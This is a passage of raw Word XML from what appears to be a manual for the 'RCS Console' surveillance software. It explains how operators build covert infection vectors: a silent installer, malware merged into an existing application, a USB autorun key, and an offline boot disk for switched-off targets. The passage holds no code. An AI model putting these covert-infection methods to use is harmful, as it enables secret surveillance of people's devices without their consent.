        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00785BC7" w:rsidRPr="00C87FEC" w:rsidRDefault="00785BC7" w:rsidP="00C87FEC">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc372642491"/>
      <w:r w:rsidRPr="00C87FEC">
        <w:lastRenderedPageBreak/>
        <w:t>Silent Installer Explanation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w:rsidR="00785BC7" w:rsidRDefault="00785BC7" w:rsidP="00785BC7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00785BC7" w:rsidRDefault="002D7F2D" w:rsidP="00785BC7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The Silent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Installer Agent</w:t>
      </w:r>
      <w:r w:rsidR="008C0E68">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> allows to create an executable file suitable for the selected platform that will install the infection vector on the Target’s device in </w:t>
      </w:r>
      <w:r w:rsidR="008C0E68" w:rsidRPr="00163021">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>silent mode</w:t>
      </w:r>
      <w:r w:rsidR="008C0E68">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. No output will be visible on the device.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C0E68" w:rsidRDefault="008C0E68" w:rsidP="00785BC7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008C0E68" w:rsidRPr="002D7F2D" w:rsidRDefault="00621E64" w:rsidP="00785BC7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="008C0E68">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>he Silent Installer Agent is available for 3 platforms: Linux, OSX and Windows.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D7F2D" w:rsidRPr="002D7F2D" w:rsidRDefault="002D7F2D" w:rsidP="00785BC7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002D7F2D" w:rsidRPr="002D7F2D" w:rsidRDefault="002D7F2D" w:rsidP="00785BC7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1433DBCF" wp14:editId="24844C66">
            <wp:extent cx="4050000" cy="3240000"/>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2D7F2D" w:rsidRPr="002D7F2D" w:rsidRDefault="002D7F2D" w:rsidP="002D7F2D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002D7F2D" w:rsidRPr="002D7F2D" w:rsidRDefault="0010013A" w:rsidP="002D7F2D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>5.2</w:t>
      </w:r>
      <w:r w:rsidR="002D7F2D" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> [ RCS Console ] Operations &gt; </w:t>
      </w:r>
      <w:r w:rsidR="002D7F2D" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:i/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t># Operation #</w:t>
      </w:r>
      <w:r w:rsidR="002D7F2D" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:r w:rsidR="002D7F2D" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:i/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t># Target #</w:t>
      </w:r>
      <w:r w:rsidR="002D7F2D" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:r w:rsidR="002D7F2D" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:i/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t># Factory #</w:t>
      </w:r>
      <w:r w:rsidR="002D7F2D" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; Build (Silent Installer)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D7F2D" w:rsidRDefault="002D7F2D" w:rsidP="00785BC7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B86039" w:rsidRDefault="00B86039" w:rsidP="00785BC7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B86039" w:rsidRDefault="00B86039" w:rsidP="00785BC7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Depending on the Target’s platform, may be available sub-parameters to customize the infection.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B86039" w:rsidRDefault="00B86039" w:rsidP="00785BC7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>These sub-parameters will be explained in detail during the training.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B86039" w:rsidRDefault="00B86039" w:rsidP="00785BC7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B86039" w:rsidRDefault="00B86039">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D3DBC" w:rsidRPr="00C87FEC" w:rsidRDefault="002D3DBC" w:rsidP="00C87FEC">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc372642492"/>
      <w:r w:rsidRPr="00C87FEC">
        <w:lastRenderedPageBreak/>
        <w:t>Melted Application Explanation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w:rsidR="002D3DBC" w:rsidRDefault="002D3DBC" w:rsidP="002D3DBC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B00254" w:rsidRDefault="00B00254" w:rsidP="00B00254">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Melted Application Agent allows to create an executable file suitable for the selected platform that will install the infection vector on the Target’s device starting from an </w:t>
      </w:r>
      <w:r w:rsidRPr="00163021">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>existing application</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, inserting the infection vector into it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B00254" w:rsidRDefault="00B00254" w:rsidP="00B00254">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B00254" w:rsidRPr="002D7F2D" w:rsidRDefault="00B00254" w:rsidP="00B00254">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidR="00B86039">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Melted Application </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Agent is available for 3 platforms: Linux, OSX and Windows.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B00254" w:rsidRPr="002D7F2D" w:rsidRDefault="00B00254" w:rsidP="00B00254">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B00254" w:rsidRPr="002D7F2D" w:rsidRDefault="00B00254" w:rsidP="00B00254">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0273A160" wp14:editId="29029BD2">
            <wp:extent cx="4050000" cy="3240000"/>
            <wp:effectExtent l="0" t="0" r="8255"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B00254" w:rsidRPr="002D7F2D" w:rsidRDefault="00B00254" w:rsidP="00B00254">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B00254" w:rsidRPr="002D7F2D" w:rsidRDefault="0010013A" w:rsidP="00B00254">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>5.3</w:t>
      </w:r>
      <w:r w:rsidR="00B00254" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> [ RCS Console ] Operations &gt; </w:t>
      </w:r>
      <w:r w:rsidR="00B00254" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:i/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t># Operation #</w:t>
      </w:r>
      <w:r w:rsidR="00B00254" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:r w:rsidR="00B00254" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:i/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t># Target #</w:t>
      </w:r>
      <w:r w:rsidR="00B00254" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:r w:rsidR="00B00254" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:i/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t># Factory #</w:t>
      </w:r>
      <w:r w:rsidR="00B00254" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; Build (</w:t>
      </w:r>
      <w:r w:rsidR="00B00254">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Melted Application</w:t>
      </w:r>
      <w:r w:rsidR="00B00254" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0087756C" w:rsidRDefault="0087756C" w:rsidP="00134262">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B86039" w:rsidRDefault="00B86039" w:rsidP="00134262">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B86039" w:rsidRDefault="00B86039" w:rsidP="00B86039">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Depending on the Target’s platform, may be available sub-parameters to customize the infection.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B86039" w:rsidRDefault="00B86039" w:rsidP="00B86039">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>These sub-parameters will be explained in detail during the training.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B86039" w:rsidRDefault="00B86039">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D3DBC" w:rsidRDefault="002D3DBC" w:rsidP="005E4792">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
        <w:rPr>
          <w:color w:val="4F81BD" w:themeColor="accent1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_Toc372642493"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>U3 Installation Explanation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w:rsidR="002D3DBC" w:rsidRDefault="002D3DBC" w:rsidP="002D3DBC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B86039" w:rsidRDefault="00B86039" w:rsidP="00B86039">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidR="001738A5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>U3 Installation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Agent allows to create an </w:t>
      </w:r>
      <w:r w:rsidR="001738A5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ISO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> file </w:t>
      </w:r>
      <w:r w:rsidR="001738A5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">for Windows platform to be written on a U3 USB-key (SanDisk) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">that will install the infection vector on the Target’s device </w:t>
      </w:r>
      <w:r w:rsidR="001738A5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">as soon as the USB-key will be plugged on the system, through the </w:t>
      </w:r>
      <w:r w:rsidR="00163021">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="001738A5" w:rsidRPr="00163021">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>utorun</w:t>
      </w:r>
      <w:r w:rsidR="001738A5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> O.S. feature. The U3 USB-key must be prepared using the U3 Customizer software (downloadable from Internet).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B86039" w:rsidRDefault="00B86039" w:rsidP="00B86039">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B86039" w:rsidRPr="002D7F2D" w:rsidRDefault="00B86039" w:rsidP="00B86039">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidR="001738A5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>U3 Installation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Agent is available for </w:t>
      </w:r>
      <w:r w:rsidR="001738A5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> platform: Windows.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B86039" w:rsidRPr="002D7F2D" w:rsidRDefault="00B86039" w:rsidP="00B86039">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B86039" w:rsidRPr="002D7F2D" w:rsidRDefault="001738A5" w:rsidP="00B86039">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="642086C1" wp14:editId="4EDE852F">
            <wp:extent cx="4050000" cy="3240000"/>
            <wp:effectExtent l="0" t="0" r="8255"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B86039" w:rsidRPr="002D7F2D" w:rsidRDefault="00B86039" w:rsidP="00B86039">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B86039" w:rsidRPr="002D7F2D" w:rsidRDefault="0010013A" w:rsidP="00B86039">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>5.4</w:t>
      </w:r>
      <w:r w:rsidR="00B86039" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> [ RCS Console ] Operations &gt; </w:t>
      </w:r>
      <w:r w:rsidR="00B86039" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:i/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t># Operation #</w:t>
      </w:r>
      <w:r w:rsidR="00B86039" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:r w:rsidR="00B86039" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:i/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t># Target #</w:t>
      </w:r>
      <w:r w:rsidR="00B86039" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:r w:rsidR="00B86039" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:i/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t># Factory #</w:t>
      </w:r>
      <w:r w:rsidR="00B86039" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; Build (</w:t>
      </w:r>
      <w:r w:rsidR="00B86039">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>U</w:t>
      </w:r>
      <w:r w:rsidR="001738A5">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00B86039">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Installation</w:t>
      </w:r>
      <w:r w:rsidR="00B86039" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B86039" w:rsidRDefault="00B86039" w:rsidP="00B86039">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002D3DBC" w:rsidRDefault="002D3DBC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D3DBC" w:rsidRDefault="002D3DBC" w:rsidP="005E4792">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
        <w:rPr>
          <w:color w:val="4F81BD" w:themeColor="accent1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_Toc372642494"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Offline Installation Explanation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p w:rsidR="002D3DBC" w:rsidRDefault="002D3DBC" w:rsidP="002D3DBC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B74AEE" w:rsidRDefault="00B74AEE" w:rsidP="00B74AEE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Offline Installation Agent allows to create an </w:t>
      </w:r>
      <w:r w:rsidR="0074280E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">ISO </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">file </w:t>
      </w:r>
      <w:r w:rsidR="0074280E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to be written on a CD/DVD or USB</w:t>
      </w:r>
      <w:r w:rsidR="000541CB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> drive </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">that will install the infection vector on the </w:t>
      </w:r>
      <w:r w:rsidR="0074280E" w:rsidRPr="00163021">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>switched-off</w:t>
      </w:r>
      <w:r w:rsidR="0074280E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Target’s device</w:t>
      </w:r>
      <w:r w:rsidR="0074280E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, booting from the external support.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B74AEE" w:rsidRDefault="00B74AEE" w:rsidP="00B74AEE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B74AEE" w:rsidRPr="002D7F2D" w:rsidRDefault="00B74AEE" w:rsidP="00B74AEE">
      <w:pPr>
